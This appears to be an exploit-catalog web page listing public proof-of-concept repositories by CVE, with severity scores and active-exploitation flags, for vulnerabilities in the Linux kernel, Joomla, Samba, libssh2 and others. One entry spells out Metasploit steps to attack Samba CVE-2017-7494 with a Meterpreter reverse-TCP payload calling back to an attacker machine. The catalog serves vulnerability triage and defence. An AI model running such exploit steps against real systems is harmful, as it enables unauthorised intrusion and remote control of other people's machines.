Public exploitation

Exploit catalog

Every public exploit we catalog, in one index. Search by CVE, exploit name or technology — and see, right beside it, what the flaw is actually worth: severity, exploitation probability, and whether it’s already under attack.

79,043cataloged exploits
36,288CVEs with public exploitation
24,695lab-tested
14,991 exploits
GitHub PoC16
Linux kernel FUSE readdir cache out-of-bounds write (CVE-2026-31694): a malicious FUSE server overflows a page-cache page by 24 bytes. PoC plus an unprivileged local-root exploit via /etc/passwd page-cache corruption. Run only inside a VM.
CVE-2026-31694HIGH30 Jun 2026
fuse: reject oversized dirents in page cache
41RISK
open
GitHub PoC2
CVE-2026-43284 - CVE-2026-43500 - CVE-2026-46300 Variant of dirtyfrag exploit
CVE-2026-46300HIGH30 Jun 2026
net: skbuff: preserve shared-frag marker during coalescing
56RISK
open
GitHub PoC1
CVE-2025-45422: Proximus b-box UPnP Persistence & Access Control Bypass
CVE-2025-45422HIGH30 Jun 2026
Incorrect access control in Proximus b-box v8c.725A allows authenticated attackers to bypass normal restrictions and mak
41RISK
open
GitHub PoC
Safari 跨域读取视频
CVE-2026-43700MEDIUM30 Jun 2026
A cross-origin issue was addressed with improved tracking of security origins. This issue is fixed in Safari 26.5.2, iOS
33RISK
open
GitHub PoC
PoC exploit for CVE-2026-10580 - Authentication Bypass in Hippoo Mobile App for WooCommerce <= 1.9.4 leading to Admin Account Takeover
CVE-2026-10580CRITICAL30 Jun 2026
Hippoo Mobile App for WooCommerce <= 1.9.4 - Unauthenticated Authentication Bypass to Administrator Account Takeover via REST API
63RISK
open
GitHub PoC
Defensive validation of CVE-2026-46331 / pedit COW with auditd, AppArmor, mitigation comparison and detection logic.
CVE-2026-46331HIGH30 Jun 2026
net/sched: fix pedit partial COW leading to page cache corruption
41RISK
open
GitHub PoC
CVE-2026-56121 — Feast <0.63.0 unauthenticated RCE via gRPC registry dill.loads of OnDemandFeatureView UDF (pre-auth). Lab + PoC, verified e2e.
CVE-2026-56121CRITICAL30 Jun 2026
Feast < 0.63.0 Unauthenticated RCE via ApplyFeatureView gRPC Deserialization
48RISK
open
GitHub PoC1
POC for CVE-2026-48907
CVE-2026-48907CRITICALunder attack30 Jun 2026
Joomla Extension - joomlacontenteditor.net - Remote Code Execution in JCE extension for Joomla < 2.9.99.5
100RISK
open
GitHub PoC
Chequeo y Fix de la vulnerabilidad "pedit COW"
CVE-2026-46331HIGH30 Jun 2026
net/sched: fix pedit partial COW leading to page cache corruption
41RISK
open
GitHub PoC
Ovaj sto se skida isto ovaj s metasplotiom kucas msf console pa onda search CVE-2017-7494 pa use exploit/linux/samba/is_known_pipeline pa show options pa set RHOSTS (ip servera) set RPORt 445 (port za tu ranjivist) SET payload linux/x86/meterpreter/reverse_tcp SET LHOST ip kalija SET LORT 4444 pa exploit i ako je ranjiv dobijemo sesiju
CVE-2017-7494CRITICALunder attackransomware30 Jun 2026
Samba since version 3.5.0 and before 4.6.4, 4.5.10 and 4.4.14 is vulnerable to remote code execution vulnerability, allo
100RISK
open
GitHub PoC2
Kestra Auth-Bypass Vulnerability Checker
CVE-2026-49869CRITICAL30 Jun 2026
Kestra: Unauthenticated Remote Code Execution via Authentication Bypass in `AuthenticationFilter`
48RISK
open
GitHub PoC
rootdirective-sec/CVE-2026-55255-Lab
CVE-2026-55255HIGH30 Jun 2026
Langflow: IDOR Vulnerability in `/api/v1/responses` Endpoint Allows Authenticated Attackers to Access Another User's Flow
41RISK
open
GitHub PoC
Defensive validation of CVE-2026-46331 / pedit COW with auditd, AppArmor, mitigation comparison and detection logic.
CVE-2026-46331HIGH30 Jun 2026
net/sched: fix pedit partial COW leading to page cache corruption
41RISK
open
GitHub PoC13
watchtowrlabs/watchTowr-vs-Netscaler-CVE-2026-8451
CVE-2026-8451HIGH30 Jun 2026
Insufficient input validation leading to memory overread
46RISK
open
GitHub PoC
Independent reverse engineering and reproduction of CVE-2015-1187, an unauthenticated command injection in the D-Link DIR-820L (Rev A, v1.05B03). MIPS firmware extraction with binwalk, static analysis in Ghidra, and tracing the `ping_addr` parameter to its command-execution sink.
CVE-2015-1187CRITICALunder attack30 Jun 2026
The ping tool in multiple D-Link and TRENDnet devices allow remote attackers to execute arbitrary code via the ping_addr
100RISK
open
GitHub PoC
CVE-2026-53753 — Crawl4AI <0.8.7 unauthenticated RCE (AST sandbox escape via gi_frame.f_back). Lab + PoC, verified e2e.
CVE-2026-53753CRITICAL29 Jun 2026
Crawl4AI: AST Sandbox Escape via gi_frame.f_back Chain - Pre-Auth RCE in Docker API
63RISK
open
GitHub PoC
cve-2026-48907 scanner
CVE-2026-48907CRITICALunder attack29 Jun 2026
Joomla Extension - joomlacontenteditor.net - Remote Code Execution in JCE extension for Joomla < 2.9.99.5
100RISK
open
GitHub PoC
DirtyClone - local privilege escalation (LPE) proof-of-concept targeting a kernel/XFRM-related vulnerability described in the source as CVE-2026-43503
CVE-2026-43503HIGH29 Jun 2026
net: skbuff: propagate shared-frag marker through frag-transfer helpers
41RISK
open
GitHub PoC1
rootdirective-sec/CVE-2026-28496-Lab
CVE-2026-28496CRITICAL29 Jun 2026
FOSSBilling: Server-side template injection in Twig template rendering enables information disclosure and RCE
63RISK
open
GitHub PoC
HutTwoThreeFour/CVE-2026-5562-Exploit
CVE-2026-5562MEDIUM29 Jun 2026
provectus kafka-ui Endpoint testexecutions validateAccess code injection
33RISK
open
GitHub PoC
xitexploiter96-dot/CVE-2026-48907-
CVE-2026-48907CRITICALunder attack29 Jun 2026
Joomla Extension - joomlacontenteditor.net - Remote Code Execution in JCE extension for Joomla < 2.9.99.5
100RISK
open
GitHub PoC
POC for CVE-2026-20253
CVE-2026-20253CRITICALunder attack29 Jun 2026
Unauthenticated Arbitrary File Creation and Truncation in a PostgreSQL Sidecar Service Endpoint in Splunk Enterprise
100RISK
open
GitHub PoC
Goal is to triage well known attacks and learn how security teams quickly respond.
CVE-2017-0144HIGHunder attackransomware29 Jun 2026
The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows
100RISK
open
GitHub PoC4
CVE-2026-55200 - Critical libssh2 Remote Code Execution Vulnerability
CVE-2026-55200CRITICAL29 Jun 2026
libssh2 - Out-of-Bounds Write via Unchecked packet_length in transport.c
48RISK
open
GitHub PoC1
React2Shell (CVE-2025-55182) PoC
CVE-2025-55182CRITICALunder attackransomware29 Jun 2026
A pre-authentication remote code execution vulnerability exists in React Server Components versions 19.0.0, 19.1.0, 19.1
100RISK
open
GitHub PoC1
CVE-2026-46817
CVE-2026-46817CRITICALunder attack29 Jun 2026
Vulnerability in the Oracle Payments product of Oracle E-Business Suite (component: File Transmission). Supported versi
83RISK
open
GitHub PoC
cve-2026-46331-audit script
CVE-2026-46331HIGH29 Jun 2026
net/sched: fix pedit partial COW leading to page cache corruption
41RISK
open
GitHub PoC
Goal is to triage well known attacks and learn how security teams quickly respond.
CVE-2021-26855CRITICALunder attackransomware29 Jun 2026
Microsoft Exchange Server Remote Code Execution Vulnerability
100RISK
open
GitHub PoC
drupal-postgresql-rce
CVE-2026-9082CRITICALunder attack29 Jun 2026
Drupal core - Highly critical - SQL injection - SA-CORE-2026-004
100RISK
open
GitHub PoC
Goal is to triage well known attacks and learn how security teams quickly respond.
CVE-2017-0144HIGHunder attackransomware29 Jun 2026
The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows
100RISK
open

We index only the public link to the proof of concept — we never host or redistribute exploitation code. Sources: PoC-in-GitHub, Exploit-DB, Nuclei, Metasploit and VulnCheck XDB. A public PoC existing does not mean the flaw is exploitable in your environment.